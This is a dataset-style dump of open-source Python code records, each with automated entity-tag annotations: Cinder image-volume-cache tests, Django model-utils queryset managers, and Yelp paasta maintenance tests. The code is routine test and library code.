vol_params = {'id': fake.VOLUME_ID,
'host': 'foo@bar#whatever',
'cluster_name': 'cluster',
'size': 0}
self.volume.update(vol_params)
self.volume_ovo = objects.Volume(self.context, **vol_params)
def _build_cache(self, max_gb=0, max_count=0):
cache = image_cache.ImageVolumeCache(self.mock_db,
self.mock_volume_api,
max_gb,
max_count)
cache.notifier = self.notifier
return cache
def _build_entry(self, size=10):
entry = {
'id': 1,
'host': 'test@foo#bar',
'cluster_name': 'cluster@foo#bar',
'image_id': 'PI:KEY',
'image_updated_at': timeutils.utcnow(with_timezone=True),
'volume_id': '70a599e0-31e7-49b7-b260-868f441e862b',
'size': size,
'last_used': timeutils.utcnow(with_timezone=True)
}
return entry
def test_get_by_image_volume(self):
cache = self._build_cache()
ret = {'id': 1}
volume_id = '70a599e0-31e7-49b7-b260-868f441e862b'
self.mock_db.image_volume_cache_get_by_volume_id.return_value = ret
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertEqual(ret, entry)
self.mock_db.image_volume_cache_get_by_volume_id.return_value = None
entry = cache.get_by_image_volume(self.context, volume_id)
self.assertIsNone(entry)
def test_evict(self):
cache = self._build_cache()
entry = self._build_entry()
cache.evict(self.context, entry)
self.mock_db.image_volume_cache_delete.assert_called_once_with(
self.context,
entry['volume_id']
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.evict', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@ddt.data(True, False)
def test_get_entry(self, clustered):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at']
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
if not clustered:
self.volume_ovo.cluster_name = None
expect = {'host': self.volume.host}
else:
expect = {'cluster_name': self.volume.cluster_name}
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertDictEqual(entry, found_entry)
(self.mock_db.
image_volume_cache_get_and_update_last_used.assert_called_once_with)(
self.context,
entry['image_id'],
**expect
)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.hit', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(entry['host'], msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_get_entry_not_exists(self):
cache = self._build_cache()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': timeutils.utcnow(with_timezone=True)
}
image_id = 'PI:KEY'
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = None
found_entry = cache.get_entry(self.context,
self.volume_ovo,
image_id,
image_meta)
self.assertIsNone(found_entry)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(image_id, msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
@mock.patch('cinder.objects.Volume.get_by_id')
def test_get_entry_needs_update(self, mock_volume_by_id):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'is_public': True,
'owner': '70a599e0-31e7-49b7-b260-868f441e862b',
'properties': {
'virtual_size': '1.7'
},
'updated_at': entry['image_updated_at'] + timedelta(hours=2)
}
(self.mock_db.
image_volume_cache_get_and_update_last_used.return_value) = entry
mock_volume = mock.MagicMock()
mock_volume_by_id.return_value = mock_volume
found_entry = cache.get_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
# Expect that the cache entry is not returned and the image-volume
# for it is deleted.
self.assertIsNone(found_entry)
self.mock_volume_api.delete.assert_called_with(self.context,
mock_volume)
msg = self.notifier.notifications[0]
self.assertEqual('image_volume_cache.miss', msg['event_type'])
self.assertEqual('INFO', msg['priority'])
self.assertEqual(self.volume.host, msg['payload']['host'])
self.assertEqual(entry['image_id'], msg['payload']['image_id'])
self.assertEqual(1, len(self.notifier.notifications))
def test_create_cache_entry(self):
cache = self._build_cache()
entry = self._build_entry()
image_meta = {
'updated_at': entry['image_updated_at']
}
self.mock_db.image_volume_cache_create.return_value = entry
created_entry = cache.create_cache_entry(self.context,
self.volume_ovo,
entry['image_id'],
image_meta)
self.assertEqual(entry, created_entry)
self.mock_db.image_volume_cache_create.assert_called_once_with(
self.context,
self.volume_ovo.host,
self.volume_ovo.cluster_name,
entry['image_id'],
entry['image_updated_at'].replace(tzinfo=None),
self.volume_ovo.id,
self.volume_ovo.size
)
def test_ensure_space_unlimited(self):
cache = self._build_cache(max_gb=0, max_count=0)
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
self.volume.size = 500
has_space = cache.ensure_space(self.context, self.volume)
self.assertTrue(has_space)
def test_ensure_space_no_entries(self):
cache = self._build_cache(max_gb=100, max_count=10)
self.mock_db.image_volume_cache_get_all.return_value = []
self.volume_ovo.size = 5
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.volume_ovo.size = 101
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
def test_ensure_space_need_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=12)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=10)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 15
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_need_count(self):
cache = self._build_cache(max_gb=30, max_count=2)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 12
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(1, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
def test_ensure_space_need_gb_and_count(self):
cache = self._build_cache(max_gb=30, max_count=3)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = []
entry1 = self._build_entry(size=10)
entries.append(entry1)
entry2 = self._build_entry(size=5)
entries.append(entry2)
entry3 = self._build_entry(size=12)
entries.append(entry3)
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 16
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertTrue(has_space)
self.assertEqual(2, mock_delete.call_count)
mock_delete.assert_any_call(self.context, entry2)
mock_delete.assert_any_call(self.context, entry3)
def test_ensure_space_cant_free_enough_gb(self):
cache = self._build_cache(max_gb=30, max_count=10)
mock_delete = mock.patch.object(cache, '_delete_image_volume').start()
entries = list(self._build_entry(size=25))
self.mock_db.image_volume_cache_get_all.return_value = entries
self.volume_ovo.size = 50
has_space = cache.ensure_space(self.context, self.volume_ovo)
self.assertFalse(has_space)
mock_delete.assert_not_called()
| 12,065 | [['PERSON', 'fake_constants'], ['LOCATION', 'TestCase'], ['PERSON', "msg['priority"], ['PERSON', "msg['priority"], ['PERSON', "msg['priority"], ['PERSON', 'mock_volume_by_id.return_value = mock_volume\n\n '], ['PERSON', "msg['priority"], ['PERSON', 'entry2'], ['PERSON', 'entry3 = self._build_entry(size=10'], ['PERSON', 'max_count=2'], ['PERSON', 'entry2'], ['PERSON', 'entry2'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['URL', 'cinder.im'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.mo'], ['URL', 'mock.Mo'], ['URL', 'self.co'], ['URL', 'ctxt.ge'], ['URL', 'self.co'], ['URL', 'cache.Im'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'cache.no'], ['URL', 'self.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.co'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'ovo.cl'], ['URL', 'self.volume.cl'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'used.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'mock.pa'], ['URL', 'cinder.objects.Volume.ge'], ['URL', 'self.mo'], ['URL', 'used.re'], ['URL', 'mock.Ma'], ['URL', 'id.re'], ['URL', 'cache.ge'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'api.delete.as'], ['URL', 'self.co'], ['URL', 'self.notifier.no'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'self.notifier.no'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.re'], ['URL', 'cache.cr'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'create.as'], ['URL', 'self.co'], ['URL', 'ovo.cl'], ['URL', 'ovo.id'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.volume.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'self.as'], ['URL', 'delete.ca'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'delete.as'], ['URL', 'self.co'], ['URL', 'mock.pa'], ['URL', 'self.mo'], ['URL', 'db.im'], ['URL', 'all.re'], ['URL', 'ovo.si'], ['URL', 'self.co'], ['URL', 'self.as'], ['URL', 'delete.as']] |
73 | from types import ClassType
import warnings
from django.contrib.contenttypes.models import ContentType
from django.db import models
from django.db.models.fields.related import OneToOneField
from django.db.models.manager import Manager
from django.db.models.query import QuerySet
import django
class InheritanceQuerySet(QuerySet):
def select_subclasses(self, *subclasses):
if not subclasses:
subclasses = [rel.var_name for rel in self.model._meta.get_all_related_objects()
if isinstance(rel.field, OneToOneField)
and issubclass(rel.field.model, self.model)]
new_qs = self.select_related(*subclasses)
new_qs.subclasses = subclasses
return new_qs
def _clone(self, klass=None, setup=False, **kwargs):
for name in ['subclasses', '_annotated']:
if hasattr(self, name):
kwargs[name] = getattr(self, name)
return super(InheritanceQuerySet, self)._clone(klass, setup, **kwargs)
def annotate(self, *args, **kwargs):
qset = super(InheritanceQuerySet, self).annotate(*args, **kwargs)
qset._annotated = [a.default_alias for a in args] + kwargs.keys()
return qset
def get_subclass(self, obj):
"""
FIX see https://bitbucket.PI:KEY
and https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses
"""
def get_attribute(obj, s):
try:
return getattr(obj,s, False)
except obj.__class__.DoesNotExist:
return False
if django.VERSION[0:2] < (1, 5):
sub_obj = [getattr(obj, s) for s in self.subclasses if getattr(obj, s)] or [obj]
else:
sub_obj = [getattr(obj, s) for s in self.subclasses if get_attribute(obj, s)] or [obj]
return sub_obj[0]
def iterator(self):
iter = super(InheritanceQuerySet, self).iterator()
if getattr(self, 'subclasses', False):
for obj in iter:
sub_obj = self.get_subclass(obj)
if getattr(self, '_annotated', False):
for k in self._annotated:
setattr(sub_obj, k, getattr(obj, k))
yield sub_obj
else:
for obj in iter:
yield obj
class InheritanceManager(models.Manager):
use_for_related_fields = True
def get_query_set(self):
return InheritanceQuerySet(self.model)
def select_subclasses(self, *subclasses):
return self.get_query_set().select_subclasses(*subclasses)
def get_subclass(self, *args, **kwargs):
return self.get_query_set().select_subclasses().get(*args, **kwargs)
class InheritanceCastMixin(object):
def cast(self):
results = tuple(self.values_list('pk', 'real_type'))
type_to_pks = {}
for pk, real_type_id in results:
type_to_pks.setdefault(real_type_id, []).append(pk)
content_types = ContentType.objects.in_bulk(type_to_pks.keys())
pk_to_child = {}
for real_type_id, pks in type_to_pks.iteritems():
content_type = content_types[real_type_id]
child_type = content_type.model_class()
children = child_type._default_manager.in_bulk(pks)
for pk, child in children.iteritems():
pk_to_child[pk] = child
children = []
# sort children into same order as parents where returned
for pk, real_type_id in results:
children.append(pk_to_child[pk])
return children
class QueryManager(models.Manager):
def __init__(self, *args, **kwargs):
if args:
self._q = args[0]
else:
self._q = models.Q(**kwargs)
super(QueryManager, self).__init__()
def order_by(self, *args):
self._order_by = args
return self
def get_query_set(self):
qs = super(QueryManager, self).get_query_set().filter(self._q)
if hasattr(self, '_order_by'):
return qs.order_by(*self._order_by)
return qs
class PassThroughManager(models.Manager):
"""
Inherit from this Manager to enable you to call any methods from your
custom QuerySet class from your manager. Simply define your QuerySet
class, and return an instance of it from your manager's `get_query_set`
method.
Alternately, if you don't need any extra methods on your manager that
aren't on your QuerySet, then just pass your QuerySet class to the
``for_queryset_class`` class method.
class PostQuerySet(QuerySet):
def enabled(self):
return self.filter(disabled=False)
class Post(models.Model):
objects = PassThroughManager.for_queryset_class(PostQuerySet)()
"""
# pickling causes recursion errors
_deny_methods = ['__getstate__', '__setstate__', '_db']
def __init__(self, queryset_cls=None):
self._queryset_cls = queryset_cls
super(PassThroughManager, self).__init__()
def __getattr__(self, name):
if name in self._deny_methods:
raise AttributeError(name)
return getattr(self.get_query_set(), name)
def get_query_set(self):
if self._queryset_cls is not None:
kargs = {'model': self.model}
if hasattr(self, '_db'):
kargs['using'] = self._db
return self._queryset_cls(**kargs)
return super(PassThroughManager, self).get_query_set()
@classmethod
def for_queryset_class(cls, queryset_cls):
class _PassThroughManager(cls):
def __init__(self):
return super(_PassThroughManager, self).__init__()
def get_query_set(self):
kwargs = {}
if hasattr(self, "_db"):
kwargs["using"] = self._db
return queryset_cls(self.model, **kwargs)
return _PassThroughManager
def manager_from(*mixins, **kwds):
"""
Returns a Manager instance with extra methods, also available and
chainable on generated querysets.
(By George Sakkis, originally posted at
http://djangosnippets.org/snippets/2117/)
:param mixins: Each ``mixin`` can be either a class or a function. The
generated manager and associated queryset subclasses extend the mixin
classes and include the mixin functions (as methods).
:keyword queryset_cls: The base queryset class to extend from
(``django.db.models.query.QuerySet`` by default).
:keyword manager_cls: The base manager class to extend from
(``django.db.models.manager.Manager`` by default).
"""
warnings.warn(
"manager_from is pending deprecation; use PassThroughManager instead.",
PendingDeprecationWarning,
stacklevel=2)
# collect separately the mixin classes and methods
bases = [kwds.get('queryset_cls', QuerySet)]
methods = {}
for mixin in mixins:
if isinstance(mixin, (ClassType, type)):
bases.append(mixin)
else:
try: methods[mixin.__name__] = mixin
except AttributeError:
raise TypeError('Mixin must be class or function, not %s' %
mixin.__class__)
# create the QuerySet subclass
id = hash(mixins + tuple(kwds.iteritems()))
new_queryset_cls = type('Queryset_%d' % id, tuple(bases), methods)
# create the Manager subclass
bases[0] = manager_cls = kwds.get('manager_cls', Manager)
new_manager_cls = type('Manager_%d' % id, tuple(bases), methods)
# and finally override new manager's get_query_set
super_get_query_set = manager_cls.get_query_set
def get_query_set(self):
# first honor the super manager's get_query_set
qs = super_get_query_set(self)
# and then try to bless the returned queryset by reassigning it to the
# newly created Queryset class, though this may not be feasible
if not issubclass(new_queryset_cls, qs.__class__):
raise TypeError('QuerySet subclass conflict: cannot determine a '
'unique class for queryset instance')
qs.__class__ = new_queryset_cls
return qs
new_manager_cls.get_query_set = get_query_set
return new_manager_cls()
| 8,353 | [['PERSON', 'qset = super(InheritanceQuerySet'], ['NRP', 'sub_obj'], ['PERSON', 'order_by'], ['PERSON', 'kargs'], ['PERSON', 'kwds'], ['PERSON', 'George Sakkis'], ['PERSON', 'mixin.__class'], ['LOCATION', 'qs.__class'], ['URL', 'https://bitbucket.org/carljm/django-model-utils/issue/15/mti-problem-with-select_subclasses'], ['URL', 'http://djangosnippets.org/snippets/2117/'], ['URL', 'django.contrib.contenttypes.mo'], ['URL', 'django.db.models.fields.re'], ['URL', 'django.db.models.ma'], ['URL', 'django.db.mo'], ['URL', 'rel.va'], ['URL', 'self.mo'], ['URL', 'meta.ge'], ['URL', 'rel.fi'], ['URL', 'rel.field.mo'], ['URL', 'self.mo'], ['URL', 'self.se'], ['URL', 'qs.su'], ['URL', 'a.de'], ['URL', 'kwargs.ke'], ['URL', 'django.VE'], ['URL', 'self.su'], ['URL', 'self.su'], ['URL', 'self.ge'], ['URL', 'models.Ma'], ['URL', 'self.mo'], ['URL', 'self.ge'], ['URL', 'self.ge'], ['URL', 'self.va'], ['URL', 'pks.se'], ['URL', 'ContentType.objects.in'], ['URL', 'pks.ke'], ['URL', 'pks.it'], ['URL', 'type.mo'], ['URL', 'manager.in'], ['URL', 'children.it'], ['URL', 'models.Ma'], ['URL', 'models.Ma'], ['URL', 'self.fi'], ['URL', 'models.Mo'], ['URL', 'PassThroughManager.fo'], ['URL', 'self.ge'], ['URL', 'self.mo'], ['URL', 'self.mo'], ['URL', 'django.db.mo'], ['URL', 'django.db.models.manager.Ma'], ['URL', 'kwds.ge'], ['URL', 'kwds.it'], ['URL', 'kwds.ge'], ['URL', 'cls.ge'], ['URL', 'cls.ge']] |
74 | # Copyright 2015-2016 Yelp Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from paasta_tools import paasta_maintenance
@mock.patch("paasta_tools.mesos_maintenance.is_host_drained", autospec=True)
@mock.patch(
"paasta_tools.mesos_maintenance.get_hosts_past_maintenance_start", autospec=True
)
def test_is_safe_to_kill(mock_get_hosts_past_maintenance_start, mock_is_host_drained):
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = []
assert not paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = False
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = ["blah"]
assert paasta_maintenance.is_safe_to_kill("blah")
mock_is_host_drained.return_value = True
mock_get_hosts_past_maintenance_start.return_value = []
assert paasta_maintenance.is_safe_to_kill("blah")
@mock.patch("paasta_tools.paasta_maintenance.is_hostname_local", autospec=True)
def test_is_safe_to_drain_rejects_non_localhosts(mock_is_hostname_local,):
mock_is_hostname_local.return_value = False
assert paasta_maintenance.is_safe_to_drain("non-localhost") is False
@mock.patch("paasta_tools.paasta_maintenance.getfqdn", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.gethostname", autospec=True)
def test_is_hostname_local_works(mock_gethostname, mock_getfqdn):
mock_gethostname.return_value = "foo"
mock_getfqdn.return_value = "foo.bar"
assert paasta_maintenance.is_hostname_local("localhost") is True
assert paasta_maintenance.is_hostname_local("foo") is True
assert paasta_maintenance.is_hostname_local("foo.bar") is True
assert paasta_maintenance.is_hostname_local("something_different") is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
def test_are_local_tasks_in_danger_fails_safe_with_false(
mock_load_system_paasta_config,
):
"""If something unexpected happens that we don't know how to
interpret, we make sure that we fail with "False" so that processes
move on and don't deadlock. In general the answer to "is it safe to drain"
is "yes" if mesos can't be reached, etc"""
mock_load_system_paasta_config.side_effect = Exception
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
def test_are_local_tasks_in_danger_is_false_with_nothing_running(
mock_marathon_services_running_here, mock_load_system_paasta_config
):
mock_marathon_services_running_here.return_value = []
assert paasta_maintenance.are_local_tasks_in_danger() is False
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
def test_are_local_tasks_in_danger_is_false_with_an_unhealthy_service(
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = False
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is False
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
@mock.patch(
"paasta_tools.paasta_maintenance.utils.load_system_paasta_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.marathon_services_running_here", autospec=True
)
@mock.patch("paasta_tools.paasta_maintenance.get_backends", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy", autospec=True)
@mock.patch("paasta_tools.paasta_maintenance.synapse_replication_is_low", autospec=True)
def test_are_local_tasks_in_danger_is_true_with_an_healthy_service_in_danger(
mock_synapse_replication_is_low,
mock_is_healthy_in_haproxy,
mock_get_backends,
mock_marathon_services_running_here,
mock_load_system_paasta_config,
):
mock_is_healthy_in_haproxy.return_value = True
mock_synapse_replication_is_low.return_value = True
mock_marathon_services_running_here.return_value = [("service", "instance", 42)]
assert paasta_maintenance.are_local_tasks_in_danger() is True
mock_is_healthy_in_haproxy.assert_called_once_with(42, mock.ANY)
assert mock_synapse_replication_is_low.call_count == 1
@mock.patch(
"paasta_tools.paasta_maintenance.load_marathon_service_config", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.load_smartstack_info_for_service", autospec=True
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_expected_instance_count_for_namespace",
autospec=True,
)
@mock.patch(
"paasta_tools.paasta_maintenance.get_replication_for_services", autospec=True
)
def test_synapse_replication_is_low_understands_underreplicated_services(
mock_get_replication_for_services,
mock_get_expected_instance_count_for_namespace,
mock_load_smartstack_info_for_service,
mock_load_marathon_service_config,
):
mock_load_marathon_service_config.return_value.get_registrations.return_value = (
"service.main"
)
mock_get_expected_instance_count_for_namespace.return_value = 3
mock_load_smartstack_info_for_service.return_value = {
"local_region": {"service.main": "up"}
}
mock_get_replication_for_services.return_value = {"service.main": 1}
local_backends = ["foo"]
system_paasta_config = mock.MagicMock()
assert (
paasta_maintenance.synapse_replication_is_low(
service="service",
instance="instance",
system_paasta_config=system_paasta_config,
local_backends=local_backends,
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_harproxy_healthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "127.0.0.1"
local_port = 42
backends = [
{"status": "UP", "pxname": "service.main", "svname": "127.0.0.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is True
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_unhealthy_path(mock_gethostbyname,):
mock_gethostbyname.return_value = "127.0.0.1"
local_port = 42
backends = [
{"status": "DOWN", "pxname": "service.main", "svname": "127.0.0.1:42_hostname"}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
@mock.patch("paasta_tools.paasta_maintenance.gethostbyname", autospec=True)
def test_is_healthy_in_haproxy_missing_backend_entirely(mock_gethostbyname,):
mock_gethostbyname.return_value = "127.0.0.1"
local_port = 42
backends = [
{
"status": "DOWN",
"pxname": "service.main",
"svname": "127.0.0.1:666_otherhostname",
}
]
assert (
paasta_maintenance.is_healthy_in_haproxy(
local_port=local_port, backends=backends
)
is False
)
| 8,242 | [['DATE_TIME', '2015-2016'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['LOCATION', 'paasta_maintenance.is_safe_to_drain("non'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', '@mock.patch("paasta_tools.paasta_maintenance.is_healthy_in_haproxy'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['NRP', 'mock_synapse_replication_is_low.call_count =='], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['PERSON', 'autospec=True'], ['URL', 'http://www.apache.org/licenses/LICENSE-2.0'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.me'], ['URL', 'maintenance.ge'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'drained.re'], ['URL', 'start.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'local.re'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostname.re'], ['URL', 'getfqdn.re'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'maintenance.is'], ['URL', 'foo.ba'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'config.si'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'haproxy.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.sy'], ['URL', 'haproxy.re'], ['URL', 'low.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 